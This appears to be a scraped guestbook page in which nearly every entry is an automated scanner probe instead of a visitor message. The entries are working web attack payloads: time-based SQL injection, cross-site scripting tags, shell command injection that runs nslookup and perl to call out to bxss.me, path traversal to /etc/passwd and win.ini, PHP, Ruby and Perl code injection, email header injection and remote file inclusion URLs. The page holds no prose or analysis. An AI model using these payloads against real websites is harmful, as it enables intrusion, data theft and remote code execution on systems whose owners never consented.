  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  -1 OR 2+933-933-1=0+0+0+1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -1' OR 2+903-903-1=0+0+0+1 --

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -1' OR 2+288-288-1=0+0+0+1 or 'M0cTes8Y'='

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -1" OR 2+476-476-1=0+0+0+1 --

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  if(now()=sysdate(),sleep(15),0)

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -1; waitfor delay '0:0:15' --

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -1); waitfor delay '0:0:15' --

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1 waitfor delay '0:0:15' --

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  DLuxPuF6'; waitfor delay '0:0:15' --

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -5 OR 181=(SELECT 181 FROM PG_SLEEP(15))--

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -5) OR 443=(SELECT 443 FROM PG_SLEEP(15))--

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  -1)) OR 168=(SELECT 168 FROM PG_SLEEP(15))--

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  YIgzozjr' OR 374=(SELECT 374 FROM PG_SLEEP(15))--

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  q4K1bUBp') OR 512=(SELECT 512 FROM PG_SLEEP(15))--

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  yyMFFOZ2')) OR 601=(SELECT 601 FROM PG_SLEEP(15))--

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1'"

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1����%2527%2522

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  @@bG0Vx

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1'"()&%<acx><ScRiPt >W3JU(9090)</ScRiPt>

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  '"()&%<acx><ScRiPt >W3JU(9357)</ScRiPt>

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  19657974

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 09:23 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 09:37 | 192.168.234.14

  1'"()&%<acx><ScRiPt >erPQ(9288)</ScRiPt>

 • Guest1

  RDFYjolf

  2023-06-12 09:37 | 192.168.234.14

  1'"()&%<acx><ScRiPt >gqsr(9039)</ScRiPt>

 • Guest1

  RDFYjolf'"()&%<acx><ScRiPt >1TgH(9780)</ScRiPt>

  2023-06-12 09:37 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 09:37 | 192.168.234.149206808

  1

 • Guest1

  RDFYjolf

  2023-06-12 09:37 | 192.168.234.149394575

  1

 • Guest19045250

  RDFYjolf

  2023-06-12 09:38 | 192.168.234.14

  1

 • Guest1

  RDFYjolf'"()&%<acx><ScRiPt >bN2e(9103)</ScRiPt>

  2023-06-12 09:38 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 09:38 | 192.168.234.14

  19155489

 • Guest1

  RDFYjolf

  2023-06-12 09:38 | 192.168.234.14

  19064988

 • Guest1

  RDFYjolf9855292

  2023-06-12 09:38 | 192.168.234.14

  1

 • Guest1

  RDFYjolf9780965

  2023-06-12 09:39 | 192.168.234.14

  1

 • Guest19282903

  RDFYjolf

  2023-06-12 09:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:51 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | response.write(9896798*9926206)

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | '+response.write(9896798*9926206)+'

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | "+response.write(9896798*9926206)+"

  1

 • Guest1

  response.write(9850519*9514389)

  2023-06-13 00:55 | 192.168.234.14

  1

 • Guest1

  '+response.write(9850519*9514389)+'

  2023-06-13 00:55 | 192.168.234.14

  1

 • Guest1

  "+response.write(9850519*9514389)+"

  2023-06-13 00:55 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | 192.168.234.14

  response.write(9087269*9615519)

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | 192.168.234.14

  '+response.write(9087269*9615519)+'

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | 192.168.234.14

  "+response.write(9087269*9615519)+"

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:55 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  echo fdhmar$()\ ghzsoo\nz^xyu||a #' &echo fdhmar$()\ ghzsoo\nz^xyu||a #|" &echo fdhmar$()\ ghzsoo\nz^xyu||a #

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  &echo jvlkas$()\ qhqesx\nz^xyu||a #' &echo jvlkas$()\ qhqesx\nz^xyu||a #|" &echo jvlkas$()\ qhqesx\nz^xyu||a #

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  |echo vuyhqo$()\ nwdumo\nz^xyu||a #' |echo vuyhqo$()\ nwdumo\nz^xyu||a #|" |echo vuyhqo$()\ nwdumo\nz^xyu||a #

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  (nslookup hitqutpdzctgdad5ef.bxss.me||perl -e "gethostbyname('hitqutpdzctgdad5ef.bxss.me')")

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  $(nslookup hitkculpreicd5b22c.bxss.me||perl -e "gethostbyname('hitkculpreicd5b22c.bxss.me')")

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  &(nslookup hitjxmbhgzrknd92e9.bxss.me||perl -e "gethostbyname('hitjxmbhgzrknd92e9.bxss.me')")&'\"`0&(nslookup hitjxmbhgzrknd92e9.bxss.me||perl -e "gethostbyname('hitjxmbhgzrknd92e9.bxss.me')")&`'

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  |(nslookup hitlkkjoimgmsa5eff.bxss.me||perl -e "gethostbyname('hitlkkjoimgmsa5eff.bxss.me')")

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  `(nslookup hitzpgiujuuwgbb431.bxss.me||perl -e "gethostbyname('hitzpgiujuuwgbb431.bxss.me')")`

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  echo hymyxi$()\ eykpkx\nz^xyu||a #' &echo hymyxi$()\ eykpkx\nz^xyu||a #|" &echo hymyxi$()\ eykpkx\nz^xyu||a #

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  &echo xvmtip$()\ sowrxs\nz^xyu||a #' &echo xvmtip$()\ sowrxs\nz^xyu||a #|" &echo xvmtip$()\ sowrxs\nz^xyu||a #

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  |echo sbpvjn$()\ lzxbvz\nz^xyu||a #' |echo sbpvjn$()\ lzxbvz\nz^xyu||a #|" |echo sbpvjn$()\ lzxbvz\nz^xyu||a #

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  (nslookup hitaeedlywyop708bb.bxss.me||perl -e "gethostbyname('hitaeedlywyop708bb.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  $(nslookup hitlnlolzkzbofc40c.bxss.me||perl -e "gethostbyname('hitlnlolzkzbofc40c.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  &(nslookup hitqyelknlngzbf02c.bxss.me||perl -e "gethostbyname('hitqyelknlngzbf02c.bxss.me')")&'\"`0&(nslookup hitqyelknlngzbf02c.bxss.me||perl -e "gethostbyname('hitqyelknlngzbf02c.bxss.me')")&`'

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  |(nslookup hitcxymxevqiobffd7.bxss.me||perl -e "gethostbyname('hitcxymxevqiobffd7.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  `(nslookup hitnkarrwappjb6b2a.bxss.me||perl -e "gethostbyname('hitnkarrwappjb6b2a.bxss.me')")`

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  ;(nslookup hitslzviidmgk499bb.bxss.me||perl -e "gethostbyname('hitslzviidmgk499bb.bxss.me')")|(nslookup hitslzviidmgk499bb.bxss.me||perl -e "gethostbyname('hitslzviidmgk499bb.bxss.me')")&(nslookup hitslzviidmgk499bb.bxss.me||perl -e "gethostbyname('hitslzviidmgk499bb.bxss.me')")

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | dbwfm2sU

  1

 • GuestZoR7qCoE

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  3QpeVA7j

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  jfHhPDXY

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | ../192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest../1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  ../../../../../../../../../../../../../../etc/passwd

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  ../../../../../../../../../../../../../../windows/win.ini

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  ../LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  ../../../../../../../../../../../../../../etc/passwd

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  ../../../../../../../../../../../../../../windows/win.ini

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  ../1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | '"

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | <!--

  1

 • Guest'"

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest<!--

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  '"

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  <!--

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  '"

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  <!--

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | '"()&%<acx><ScRiPt >stGP(9508)</ScRiPt>

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.149893445

  1

 • Guest19485228

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT'"()&%<acx><ScRiPt >stGP(9311)</ScRiPt>

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  '"()&%<acx><ScRiPt >stGP(9336)</ScRiPt>

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT9876864

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1'"()&%<acx><ScRiPt >stGP(9607)</ScRiPt>

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  '"()&%<acx><ScRiPt >stGP(9084)</ScRiPt>

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  19667395

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14&n907898=v928386

  1

 • Guest1

  LgyxmpHT&n988157=v987953

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1&n985562=v924621

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT%0abcc:009247.20-10771.20.3514b.19521.2@bxss.me

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  to@example.com>%0d%0abcc:009247.20-10772.20.3514b.19521.2@bxss.me

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1%0abcc:009247.20-10775.20.3514b.19521.2@bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  to@example.com>%0d%0abcc:009247.20-10776.20.3514b.19521.2@bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | /xfs.bxss.me

  1

 • Guest918492

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  /xfs.bxss.me

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  /xfs.bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT<esi:include src="http://bxss.me/rpb.png"/>

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1<esi:include src="http://bxss.me/rpb.png"/>

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | ${9999582+9999749}

  1

 • Guest1

  ${9999181+10000122}

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  ${9999400+10000435}

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | Http://bxss.me/t/fit.txt

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | http://bxss.me/t/fit.txt%3F.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | bxss.me

  1

 • Guestbxss.me

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  1some_inexistent_file_with_long_name%00.jpg

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  Http://bxss.me/t/fit.txt

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  http://bxss.me/t/fit.txt%3F.jpg

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  bxss.me

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1some_inexistent_file_with_long_name%00.jpg

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  Http://bxss.me/t/fit.txt

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  http://bxss.me/t/fit.txt%3F.jpg

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  bxss.me

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  azFwMzJRTDA=

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | )

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | !(()&&!|*|*|

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | ^(#$!@#$)(()))******

  1

 • Guest)

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  )

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  !(()&&!|*|*|

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  ^(#$!@#$)(()))******

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  )

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  !(()&&!|*|*|

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  ^(#$!@#$)(()))******

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | HttP://bxss.me/t/xss.html?%00

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | bxss.me/t/xss.html?%00

  1

 • Guest1

  HttP://bxss.me/t/xss.html?%00

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  bxss.me/t/xss.html?%00

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  HttP://bxss.me/t/xss.html?%00

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  bxss.me/t/xss.html?%00

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  "+"A".concat(70-3).concat(22*4).concat(109).concat(80).concat(118).concat(78)+(require"socket" Socket.gethostbyname("hitrz"+"cwqhfbov632dc.bxss.me.")[3].to_s)+"

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  '+'A'.concat(70-3).concat(22*4).concat(113).concat(80).concat(115).concat(76)+(require'socket' Socket.gethostbyname('hitmz'+'ciwqfmtu0f6aa.bxss.me.')[3].to_s)+'

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  "+"A".concat(70-3).concat(22*4).concat(121).concat(76).concat(118).concat(83)+(require"socket" Socket.gethostbyname("hitpu"+"adwznovg6b2de.bxss.me.")[3].to_s)+"

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  '+'A'.concat(70-3).concat(22*4).concat(101).concat(90).concat(102).concat(67)+(require'socket' Socket.gethostbyname('hitog'+'baysqdwa5f082.bxss.me.')[3].to_s)+'

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  '.gethostbyname(lc('hitqd'.'cfplbxne78f36.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(78).chr(98).chr(80).'

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  ".gethostbyname(lc("hitni"."qlhjhovi64d3e.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(80).chr(101).chr(75)."

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  '.gethostbyname(lc('hitvi'.'ihcwxvoobbde7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(85).chr(101).chr(73).'

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  ".gethostbyname(lc("hitjr"."ontnsxqqc8989.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(72).chr(102).chr(72)."

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | ';print(md5(31337));$a='

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | ";print(md5(31337));$a="

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | ${@print(md5(31337))}

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | ${@print(md5(31337))}\

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:57 | '.print(md5(31337)).'

  1

 • Guest1

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  ';print(md5(31337));$a='

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  ";print(md5(31337));$a="

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  ${@print(md5(31337))}

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  ${@print(md5(31337))}\

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  '.print(md5(31337)).'

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  ';print(md5(31337));$a='

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  ";print(md5(31337));$a="

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  ${@print(md5(31337))}

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  ${@print(md5(31337))}\

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  '.print(md5(31337)).'

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:58 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:59 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

